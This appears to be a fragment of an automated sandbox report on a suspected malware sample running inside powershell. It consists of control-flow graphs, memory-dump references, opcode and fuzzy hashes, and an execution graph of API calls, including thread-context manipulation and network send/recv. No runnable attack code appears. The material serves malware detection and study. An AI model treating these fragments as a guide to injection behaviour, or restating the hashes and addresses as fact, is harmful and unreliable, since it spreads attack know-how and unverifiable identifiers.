                                                                                                                      • Opcode Fuzzy Hash: 89d565a489cd638724555b1291201bccdac0d96965b6b0f6970bfe017e89e338
                                                                                                                      • Instruction Fuzzy Hash: FA2103B291064A8FDB20CFAAC944BDEFBF4EB88324F148469D458B7600D778A545CFA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 226 42472fc-4249230 228 4249232-424923a 226->228 229 424923c-4249268 Wow64SetThreadContext 226->229 228->229 230 4249271-4249292 229->230 231 424926a-4249270 229->231 231->230
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04248923), ref: 0424925B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: ce94a788dd357c005850d3b2e66e0703d5cfb1223966e4c336e0337e068bf8bb
                                                                                                                      • Instruction ID: 188962877af9f4593e0c6a5b8c7fe4ff7334aa7931f28e0f93d2c12cbb4aa607
                                                                                                                      • Opcode Fuzzy Hash: ce94a788dd357c005850d3b2e66e0703d5cfb1223966e4c336e0337e068bf8bb
                                                                                                                      • Instruction Fuzzy Hash: E71114B291064A8FDB10CFAAC844B9FBBF4EB88220F148029E559B3600D778A545CFA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 233 4247320-4249230 235 4249232-424923a 233->235 236 424923c-4249268 Wow64SetThreadContext 233->236 235->236 237 4249271-4249292 236->237 238 424926a-4249270 236->238 238->237
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04248923), ref: 0424925B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: 8ec43707e21d8ffb499f963d65739677d1c2d7c0cb9a536e9bae8c1d71981f3b
                                                                                                                      • Instruction ID: 84cbb364bcdf6c2ca7ba4af5c16c55becf5664803ea0a06610a37fa92ae54278
                                                                                                                      • Opcode Fuzzy Hash: 8ec43707e21d8ffb499f963d65739677d1c2d7c0cb9a536e9bae8c1d71981f3b
                                                                                                                      • Instruction Fuzzy Hash: FE1114B291060A8FDB14CFAAC944B9FBBF4EB88220F158029E519B3600D778A545CFA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 821 70e1f18-70e1f3a 822 70e20b7-70e20c2 821->822 823 70e1f40-70e1f45 821->823 829 70e20ca-70e2102 822->829 830 70e20c4-70e20c9 822->830 824 70e1f5d-70e1f69 823->824 825 70e1f47-70e1f4d 823->825 835 70e1f6f-70e1f72 824->835 836 70e2062-70e206c 824->836 826 70e1f4f 825->826 827 70e1f51-70e1f5b 825->827 826->824 827->824 833 70e225d-70e2266 829->833 834 70e2108-70e210d 829->834 830->829 852 70e226e-70e227a 833->852 853 70e2268-70e226b 833->853 839 70e210f-70e2115 834->839 840 70e2125-70e2129 834->840 835->836 841 70e1f78-70e1f7f 835->841 837 70e206e-70e2077 836->837 838 70e207a-70e2080 836->838 843 70e2086-70e2092 838->843 844 70e2082-70e2084 838->844 845 70e2119-70e2123 839->845 846 70e2117 839->846 848 70e212f-70e2133 840->848 849 70e2208-70e2212 840->849 841->822 847 70e1f85-70e1f8a 841->847 856 70e2094-70e20b4 843->856 844->856 845->840 846->840 857 70e1f8c-70e1f92 847->857 858 70e1fa2-70e1fa6 847->858 850 70e2135-70e2146 848->850 851 70e2173 848->851 854 70e2214-70e221d 849->854 855 70e2220-70e2226 849->855 850->833 878 70e214c-70e2151 850->878 864 70e2175-70e2177 851->864 860 70e227c-70e2281 852->860 861 70e2282-70e22a2 852->861 853->852 862 70e222c-70e2238 855->862 863 70e2228-70e222a 855->863 867 70e1f96-70e1fa0 857->867 868 70e1f94 857->868 858->836 859 70e1fac-70e1fb0 858->859 871 70e1fb2-70e1fce 859->871 872 70e1fd0 859->872 860->861 873 70e244c-70e247c 861->873 874 70e22a8-70e22ad 861->874 875 70e223a-70e225a 862->875 863->875 864->849 876 70e217d-70e2181 864->876 867->858 868->858 881 70e1fd2-70e1fd4 871->881 872->881 903 70e247e-70e249b 873->903 904 70e24b5-70e24bf 873->904 879 70e22af-70e22b5 874->879 880 70e22c5-70e22c9 874->880 876->849 883 70e2187-70e2196 876->883 887 70e2169-70e2171 878->887 888 70e2153-70e2159 878->888 890 70e22b9-70e22c3 879->890 891 70e22b7 879->891 884 70e22cf-70e22d3 880->884 885 70e23f4-70e23fe 880->885 881->836 892 70e1fda-70e1fe7 881->892 905 70e21ae-70e2205 883->905 906 70e2198-70e219e 883->906 895 70e22d5-70e22e6 884->895 896 70e2313 884->896 897 70e240c-70e2412 885->897 898 70e2400-70e2409 885->898 887->864 899 70e215d-70e2167 888->899 900 70e215b 888->900 890->880 891->880 923 70e1fee-70e1ff0 892->923 895->873 924 70e22ec-70e22f1 895->924 911 70e2315-70e2317 896->911 908 70e2418-70e2424 897->908 909 70e2414-70e2416 897->909 899->887 900->887 933 70e249d-70e24af 903->933 934 70e2505-70e250a 903->934 919 70e24c8-70e24ce 904->919 920 70e24c1-70e24c5 904->920 914 70e21a2-70e21a4 906->914 915 70e21a0 906->915 917 70e2426-70e2449 908->917 909->917 911->885 921 70e231d-70e2321 911->921 914->905 915->905 925 70e24d4-70e24e0 919->925 926 70e24d0-70e24d2 919->926 921->885 929 70e2327-70e232b 921->929 936 70e2008-70e205f 923->936 937 70e1ff2-70e1ff8 923->937 930 70e2309-70e2311 924->930 931 70e22f3-70e22f9 924->931 938 70e24e2-70e2502 925->938 926->938 929->885 935 70e2331-70e2357 929->935 930->911 941 70e22fd-70e2307 931->941 942 70e22fb 931->942 933->904 934->933 935->885 952 70e235d-70e2361 935->952 939 70e1ffc-70e1ffe 937->939 940 70e1ffa 937->940 939->936 940->936 941->930 942->930 953 70e2384 952->953 954 70e2363-70e236c 952->954 957 70e2387-70e2394 953->957 955 70e236e-70e2371 954->955 956 70e2373-70e2380 954->956 958 70e2382 955->958 956->958 960 70e239a-70e23f1 957->960 958->957
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fd564440b4601cf93ded31825f9534268dc5008f9313ea33f3823aa62bf002eb
                                                                                                                      • Instruction ID: fadcff9b796476ae817a5bc7554bf367ed920008a4d320efd5b9c2bede387681
                                                                                                                      • Opcode Fuzzy Hash: fd564440b4601cf93ded31825f9534268dc5008f9313ea33f3823aa62bf002eb
                                                                                                                      • Instruction Fuzzy Hash: 94F115B1B0420ADFDB558B79C800BAEBBEEBFC5310F14827AD5198B291DB71C945CB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 962 70e09c8-70e09eb 963 70e0bc6-70e0c0e 962->963 964 70e09f1-70e09f6 962->964 972 70e0d7b-70e0d86 963->972 973 70e0c14-70e0c19 963->973 965 70e0a0e-70e0a12 964->965 966 70e09f8-70e09fe 964->966 969 70e0a18-70e0a1c 965->969 970 70e0b73-70e0b7d 965->970 967 70e0a02-70e0a0c 966->967 968 70e0a00 966->968 967->965 968->965 976 70e0a1e-70e0a2d 969->976 977 70e0a2f 969->977 974 70e0b7f-70e0b88 970->974 975 70e0b8b-70e0b91 970->975 994 70e0d8e-70e0dad 972->994 995 70e0d88-70e0d8c 972->995 978 70e0c1b-70e0c21 973->978 979 70e0c31-70e0c35 973->979 980 70e0b97-70e0ba3 975->980 981 70e0b93-70e0b95 975->981 983 70e0a31-70e0a33 976->983 977->983 984 70e0c25-70e0c2f 978->984 985 70e0c23 978->985 987 70e0d2a-70e0d34 979->987 988 70e0c3b-70e0c3d 979->988 986 70e0ba5-70e0bc3 980->986 981->986 983->970 990 70e0a39-70e0a59 983->990 984->979 985->979 996 70e0d36-70e0d3f 987->996 997 70e0d42-70e0d48 987->997 992 70e0c3f-70e0c4b 988->992 993 70e0c4d 988->993 1017 70e0a5b-70e0a76 990->1017 1018 70e0a78 990->1018 1001 70e0c4f-70e0c51 992->1001 993->1001 1005 70e0daf-70e0dbb 994->1005 1006 70e0dbd 994->1006 995->994 998 70e0d4e-70e0d5a 997->998 999 70e0d4a-70e0d4c 997->999 1008 70e0d5c-70e0d78 998->1008 999->1008 1001->987 1009 70e0c57-70e0c59 1001->1009 1007 70e0dbf-70e0dc1 1005->1007 1006->1007 1010 70e0e0d-70e0e17 1007->1010 1011 70e0dc3-70e0dc9 1007->1011 1013 70e0c5b-70e0c67 1009->1013 1014 70e0c69 1009->1014 1022 70e0e19-70e0e1f 1010->1022 1023 70e0e22-70e0e28 1010->1023 1019 70e0dcb-70e0dcd 1011->1019 1020 70e0dd7-70e0df4 1011->1020 1024 70e0c6b-70e0c6d 1013->1024 1014->1024 1025 70e0a7a-70e0a7c 1017->1025 1018->1025 1019->1020 1041 70e0e5a-70e0e5f 1020->1041 1042 70e0df6-70e0e07 1020->1042 1026 70e0e2e-70e0e3a 1023->1026 1027 70e0e2a-70e0e2c 1023->1027 1024->987 1028 70e0c73-70e0c75 1024->1028 1025->970 1030 70e0a82-70e0a84 1025->1030 1033 70e0e3c-70e0e57 1026->1033 1027->1033 1034 70e0c8f-70e0c93 1028->1034 1035 70e0c77-70e0c7d 1028->1035 1039 70e0a86-70e0a92 1030->1039 1040 70e0a94 1030->1040 1037 70e0cad-70e0d27 1034->1037 1038 70e0c95-70e0c9b 1034->1038 1043 70e0c7f 1035->1043 1044 70e0c81-70e0c8d 1035->1044 1045 70e0c9f-70e0cab 1038->1045 1046 70e0c9d 1038->1046 1049 70e0a96-70e0a98 1039->1049 1040->1049 1041->1042 1042->1010 1043->1034 1044->1034 1045->1037 1046->1037 1049->970 1053 70e0a9e-70e0abe 1049->1053 1060 70e0ad6-70e0ada 1053->1060 1061 70e0ac0-70e0ac6 1053->1061 1062 70e0adc-70e0ae2 1060->1062 1063 70e0af4-70e0af8 1060->1063 1064 70e0aca-70e0acc 1061->1064 1065 70e0ac8 1061->1065 1066 70e0ae6-70e0af2 1062->1066 1067 70e0ae4 1062->1067 1068 70e0aff-70e0b01 1063->1068 1064->1060 1065->1060 1066->1063 1067->1063 1069 70e0b19-70e0b70 1068->1069 1070 70e0b03-70e0b09 1068->1070 1072 70e0b0d-70e0b0f 1070->1072 1073 70e0b0b 1070->1073 1072->1069 1073->1069
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 214db1d2809748e120d90f2c0ba526272a0809d5039975704ea9958a16bc0789
                                                                                                                      • Instruction ID: d01bd3219a2b803e693048b548e95057053889ae29dd631860c8af48cc232ac9
                                                                                                                      • Opcode Fuzzy Hash: 214db1d2809748e120d90f2c0ba526272a0809d5039975704ea9958a16bc0789
                                                                                                                      • Instruction Fuzzy Hash: BDC129B170430ADFDB649B79980076ABBE9AFC1214F38827BD555CB282DBB1D841C7A1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1075 70e13a0-70e13c6 1076 70e13cc-70e13d1 1075->1076 1077 70e1572-70e1584 1075->1077 1078 70e13e9-70e13ed 1076->1078 1079 70e13d3-70e13d9 1076->1079 1085 70e159b-70e15ba 1077->1085 1086 70e1586-70e1599 1077->1086 1083 70e151e-70e1528 1078->1083 1084 70e13f3-70e13f5 1078->1084 1081 70e13dd-70e13e7 1079->1081 1082 70e13db 1079->1082 1081->1078 1082->1078 1087 70e152a-70e1533 1083->1087 1088 70e1536-70e153c 1083->1088 1089 70e13f7-70e1403 1084->1089 1090 70e1405 1084->1090 1091 70e16ec-70e1708 1085->1091 1092 70e15c0-70e15c5 1085->1092 1086->1085 1094 70e153e-70e1540 1088->1094 1095 70e1542-70e154e 1088->1095 1096 70e1407-70e1409 1089->1096 1090->1096 1115 70e170a-70e1710 1091->1115 1116 70e1711-70e171d 1091->1116 1097 70e15dd-70e15e1 1092->1097 1098 70e15c7-70e15cd 1092->1098 1099 70e1550-70e156f 1094->1099 1095->1099 1096->1083 1100 70e140f-70e1413 1096->1100 1106 70e169e-70e16a8 1097->1106 1107 70e15e7-70e15e9 1097->1107 1101 70e15cf 1098->1101 1102 70e15d1-70e15db 1098->1102 1103 70e1426 1100->1103 1104 70e1415-70e1424 1100->1104 1101->1097 1102->1097 1111 70e1428-70e142a 1103->1111 1104->1111 1109 70e16aa-70e16b2 1106->1109 1110 70e16b5-70e16bb 1106->1110 1112 70e15eb-70e15f7 1107->1112 1113 70e15f9 1107->1113 1119 70e16bd-70e16bf 1110->1119 1120 70e16c1-70e16cd 1110->1120 1111->1083 1122 70e1430-70e1432 1111->1122 1123 70e15fb-70e15fd 1112->1123 1113->1123 1115->1116 1117 70e171f-70e172b 1116->1117 1118 70e172d 1116->1118 1125 70e172f-70e1731 1117->1125 1118->1125 1126 70e16cf-70e16e9 1119->1126 1120->1126 1127 70e1434-70e1440 1122->1127 1128 70e1442 1122->1128 1123->1106 1124 70e1603-70e1605 1123->1124 1130 70e161f-70e1621 1124->1130 1131 70e1607-70e160d 1124->1131 1133 70e179f-70e17a9 1125->1133 1134 70e1733-70e1752 1125->1134 1132 70e1444-70e1446 1127->1132 1128->1132 1145 70e1628-70e162a 1130->1145 1138 70e160f 1131->1138 1139 70e1611-70e161d 1131->1139 1132->1083 1141 70e144c-70e144e 1132->1141 1136 70e17ab-70e17af 1133->1136 1137 70e17b2-70e17b8 1133->1137 1165 70e1754-70e1760 1134->1165 1166 70e1762 1134->1166 1142 70e17be-70e17ca 1137->1142 1143 70e17ba-70e17bc 1137->1143 1138->1130 1139->1130 1146 70e1468-70e1473 1141->1146 1147 70e1450-70e1456 1141->1147 1152 70e17cc-70e17ea 1142->1152 1143->1152 1154 70e162c-70e1632 1145->1154 1155 70e1642-70e169b 1145->1155 1150 70e1475-70e1478 1146->1150 1151 70e1482-70e148e 1146->1151 1148 70e145a-70e1466 1147->1148 1149 70e1458 1147->1149 1148->1146 1149->1146 1150->1151 1157 70e149c-70e14ac 1151->1157 1158 70e1490-70e1492 1151->1158 1161 70e1636-70e1638 1154->1161 1162 70e1634 1154->1162 1170 70e14ae-70e14b4 1157->1170 1171 70e14c4-70e151b 1157->1171 1158->1157 1161->1155 1162->1155 1169 70e1764-70e1766 1165->1169 1166->1169 1169->1133 1172 70e1768-70e1785 1169->1172 1174 70e14b8-70e14ba 1170->1174 1175 70e14b6 1170->1175 1178 70e17ed-70e17f2 1172->1178 1179 70e1787-70e1799 1172->1179 1174->1171 1175->1171 1178->1179 1179->1133
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7a98a6d843024b50259f7ed794a8462c030fa3a73a7cf65a165409ec4a5bf0b4
                                                                                                                      • Instruction ID: 83f1460eb171f13c0a57adc3c2f2ba95d02c02338252f14216fc299fcb9941c7
                                                                                                                      • Opcode Fuzzy Hash: 7a98a6d843024b50259f7ed794a8462c030fa3a73a7cf65a165409ec4a5bf0b4
                                                                                                                      • Instruction Fuzzy Hash: 4EB119B570430EDFDB658B79880076ABBEAAFC5211F28827BD455CB291DB31C941C761
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ede2d8189500bb3775e58c550018028e41af6030812cf09ab5256823129cb866
                                                                                                                      • Instruction ID: 14045ae9686007c4347530fdda9ae38c5b2e99c8144f5373a953c195264b20a6
                                                                                                                      • Opcode Fuzzy Hash: ede2d8189500bb3775e58c550018028e41af6030812cf09ab5256823129cb866
                                                                                                                      • Instruction Fuzzy Hash: 61518C74B00208CFDB44CB98C554BAEBBF6AF89314F158169E905AF351CB72ED41CB92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 138bb2d789ba42843fad83d1fcb9ebcd3793e68ca2897034bcc2a9bfbbde775b
                                                                                                                      • Instruction ID: 21d9bf0ded9b6bcb4cf3f3180976be4702b493250a5c8cedc497a904057c5e44
                                                                                                                      • Opcode Fuzzy Hash: 138bb2d789ba42843fad83d1fcb9ebcd3793e68ca2897034bcc2a9bfbbde775b
                                                                                                                      • Instruction Fuzzy Hash: 4851D0B4A00209CFDB04CB58C544B9EBBF6EF89314F1981A9E504AF351CB72EC41CB92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 14347921fad12505d189ed76d2d1a440090ed7287c051f8b8e631400e7e5db1f
                                                                                                                      • Instruction ID: bdcfa2f641dcc3c5ba185f2d095640e24eb5ff034f046637f8d17ad0f63b317d
                                                                                                                      • Opcode Fuzzy Hash: 14347921fad12505d189ed76d2d1a440090ed7287c051f8b8e631400e7e5db1f
                                                                                                                      • Instruction Fuzzy Hash: 973126B060030ADFDB608E24D41076E7BE9AF81254F3D8267D851DB292EBB5C984C772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0e3791cff40ce99f3d011467c68890f4c9f26038cb6f0f156d8dba50ee4a07de
                                                                                                                      • Instruction ID: 94ddb898eebbe1b607786df8b5dec3af570c1de7a7f12e11a29a538a92f5473b
                                                                                                                      • Opcode Fuzzy Hash: 0e3791cff40ce99f3d011467c68890f4c9f26038cb6f0f156d8dba50ee4a07de
                                                                                                                      • Instruction Fuzzy Hash: 1931F8B0A0534ADFCBA5CF25C440B797BFDBF85214F0982A6D518CB292D735C884CB92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c9e915a1f8fa0b06cd3ad8faaffeb23d0a3cfc13455fee68e77ee5fad5ae70b4
                                                                                                                      • Instruction ID: b27be82a46715ed0166e650f259418bd6a896e9c6b008d00ef298bb2feb9aa2a
                                                                                                                      • Opcode Fuzzy Hash: c9e915a1f8fa0b06cd3ad8faaffeb23d0a3cfc13455fee68e77ee5fad5ae70b4
                                                                                                                      • Instruction Fuzzy Hash: 8701719655E3D05FE30323B09C265D03F758E97268B1E01D7E491EB1E3E49A5D8E83B2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484033171.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_415d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2e46a81bb49895d73e3c10347782c0c7f0da4a84d132d2077a01b042ac49f102
                                                                                                                      • Instruction ID: 0ac92536be54f1759bfba94a3df62ff38279494a2c28d78cc02e50b06d4507a7
                                                                                                                      • Opcode Fuzzy Hash: 2e46a81bb49895d73e3c10347782c0c7f0da4a84d132d2077a01b042ac49f102
                                                                                                                      • Instruction Fuzzy Hash: B101F271508344DAE7144E25F9C0BA7BF98DF81324F18C45AED184A262CBB8A842C7B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484033171.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_415d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 14f37ef7ccd592733ef167cb3111d836571156fa96ec54e4013252fc6d897a1d
                                                                                                                      • Instruction ID: c8a3c5f0e2b7efd89c063bc78a000d5c258dab24210f6e403b4016a8d721a932
                                                                                                                      • Opcode Fuzzy Hash: 14f37ef7ccd592733ef167cb3111d836571156fa96ec54e4013252fc6d897a1d
                                                                                                                      • Instruction Fuzzy Hash: 66015EA240E3C09EE7128B259D94B52BFA4DF42224F19C0DBDD888F2A3C2699845C772

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:6.1%
                                                                                                                      Total number of Nodes:977
                                                                                                                      Total number of Limit Nodes:45
                                                                                                                      execution_graph 46200 41d4e0 46201 41d4f6 ctype ___scrt_fastfail 46200->46201 46202 41d6f3 46201->46202 46204 431fa9 21 API calls 46201->46204 46206 41d744 46202->46206 46216 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46202->46216 46209 41d6a6 ___scrt_fastfail 46204->46209 46205 41d704 46205->46206 46207 41d770 46205->46207 46217 431fa9 46205->46217 46207->46206 46225 41d484 21 API calls ___scrt_fastfail 46207->46225 46209->46206 46210 431fa9 21 API calls 46209->46210 46214 41d6ce ___scrt_fastfail 46210->46214 46212 41d73d ___scrt_fastfail 46212->46206 46222 43265f 46212->46222 46214->46206 46215 431fa9 21 API calls 46214->46215 46215->46202 46216->46205 46218 431fb3 46217->46218 46219 431fb7 46217->46219 46218->46212 46226 43a89c 46219->46226 46235 43257f 46222->46235 46224 432667 46224->46207 46225->46206 46232 446b0f _strftime 46226->46232 46227 446b4d 46234 445364 20 API calls __dosmaperr 46227->46234 46228 446b38 RtlAllocateHeap 46230 431fbc 46228->46230 46228->46232 46230->46212 46232->46227 46232->46228 46233 442210 7 API calls 2 library calls 46232->46233 46233->46232 46234->46230 46236 43258e 46235->46236 46237 432598 46235->46237 46236->46224 46237->46236 46238 431fa9 21 API calls 46237->46238 46239 4325b9 46238->46239 46239->46236 46241 43294a CryptAcquireContextA 46239->46241 46242 432966 46241->46242 46243 43296b CryptGenRandom 46241->46243 46242->46236 46243->46242 46244 432980 CryptReleaseContext 46243->46244 46244->46242 46245 426040 46250 426107 recv 46245->46250 46251 4260a1 46256 42611e send 46251->46256 46257 43a9a8 46260 43a9b4 _swprintf __FrameHandler3::FrameUnwindToState 46257->46260 46258 43a9c2 46275 445364 20 API calls __dosmaperr 46258->46275 46260->46258 46263 43a9ec 46260->46263 46261 43a9c7 46276 43a837 26 API calls _Deallocate 46261->46276 46270 444adc EnterCriticalSection 46263->46270 46265 43a9d2 __wsopen_s 46266 43a9f7 46271 43aa98 46266->46271 46270->46266 46273 43aaa6 46271->46273 46272 43aa02 46277 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46272->46277 46273->46272 46278 448426 39 API calls 2 library calls 46273->46278 46275->46261 46276->46265 46277->46265 46278->46273 46279 402bcc 46280 402bd7 46279->46280 46281 402bdf 46279->46281 46297 403315 28 API calls 2 library calls 46280->46297 46282 402beb 46281->46282 46287 4015d3 46281->46287 46285 402bdd 46289 43361d 46287->46289 46288 43a89c _Yarn 21 API calls 46288->46289 46289->46288 46290 402be9 46289->46290 46293 43363e std::_Facet_Register 46289->46293 46298 442210 7 API calls 2 library calls 46289->46298 46292 433dfc std::_Facet_Register 46300 437be7 RaiseException 46292->46300 46293->46292 46299 437be7 RaiseException 46293->46299 46295 433e19 46297->46285 46298->46289 46299->46292 46300->46295 46301 4339ce 46302 4339da __FrameHandler3::FrameUnwindToState 46301->46302 46333 4336c3 46302->46333 46304 4339e1 46305 433b34 46304->46305 46308 433a0b 46304->46308 46633 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46305->46633 46307 433b3b 46634 4426ce 28 API calls _Atexit 46307->46634 46319 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46308->46319 46627 4434e1 5 API calls _ValidateLocalCookies 46308->46627 46310 433b41 46635 442680 28 API calls _Atexit 46310->46635 46313 433a24 46315 433a2a 46313->46315 46628 443485 5 API calls _ValidateLocalCookies 46313->46628 46314 433b49 46317 433aab 46344 433c6e 46317->46344 46319->46317 46629 43ee04 38 API calls 4 library calls 46319->46629 46327 433acd 46327->46307 46328 433ad1 46327->46328 46329 433ada 46328->46329 46631 442671 28 API calls _Atexit 46328->46631 46632 433852 13 API calls 2 library calls 46329->46632 46332 433ae2 46332->46315 46334 4336cc 46333->46334 46636 433e1a IsProcessorFeaturePresent 46334->46636 46336 4336d8 46637 4379fe 10 API calls 3 library calls 46336->46637 46338 4336dd 46343 4336e1 46338->46343 46638 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46338->46638 46340 4336f8 46340->46304 46341 4336ea 46341->46340 46639 437a27 8 API calls 3 library calls 46341->46639 46343->46304 46640 436060 46344->46640 46347 433ab1 46348 443432 46347->46348 46642 44ddd9 46348->46642 46350 433aba 46353 40d767 46350->46353 46351 44343b 46351->46350 46646 44e0e3 38 API calls 46351->46646 46648 41bcf3 LoadLibraryA GetProcAddress 46353->46648 46355 40d783 GetModuleFileNameW 46653 40e168 46355->46653 46357 40d79f 46668 401fbd 46357->46668 46360 401fbd 28 API calls 46361 40d7bd 46360->46361 46672 41afd3 46361->46672 46365 40d7cf 46697 401d8c 46365->46697 46367 40d7d8 46368 40d835 46367->46368 46369 40d7eb 46367->46369 46703 401d64 46368->46703 46954 40e986 111 API calls 46369->46954 46372 40d845 46375 401d64 28 API calls 46372->46375 46373 40d7fd 46374 401d64 28 API calls 46373->46374 46378 40d809 46374->46378 46376 40d864 46375->46376 46708 404cbf 46376->46708 46955 40e937 68 API calls 46378->46955 46379 40d873 46712 405ce6 46379->46712 46382 40d824 46956 40e155 68 API calls 46382->46956 46383 40d87f 46715 401eef 46383->46715 46386 40d82d 46390 401eea 26 API calls 46386->46390 46387 40d88b 46719 401eea 46387->46719 46389 40d894 46391 401eea 26 API calls 46389->46391 46392 40dc9f 46390->46392 46393 40d89d 46391->46393 46630 433ca4 GetModuleHandleW 46392->46630 46394 401d64 28 API calls 46393->46394 46395 40d8a6 46394->46395 46723 401ebd 46395->46723 46397 40d8b1 46398 401d64 28 API calls 46397->46398 46399 40d8ca 46398->46399 46400 401d64 28 API calls 46399->46400 46402 40d8e5 46400->46402 46401 40d946 46404 401d64 28 API calls 46401->46404 46418 40e134 46401->46418 46402->46401 46957 4085b4 46402->46957 46409 40d95d 46404->46409 46405 40d912 46406 401eef 26 API calls 46405->46406 46407 40d91e 46406->46407 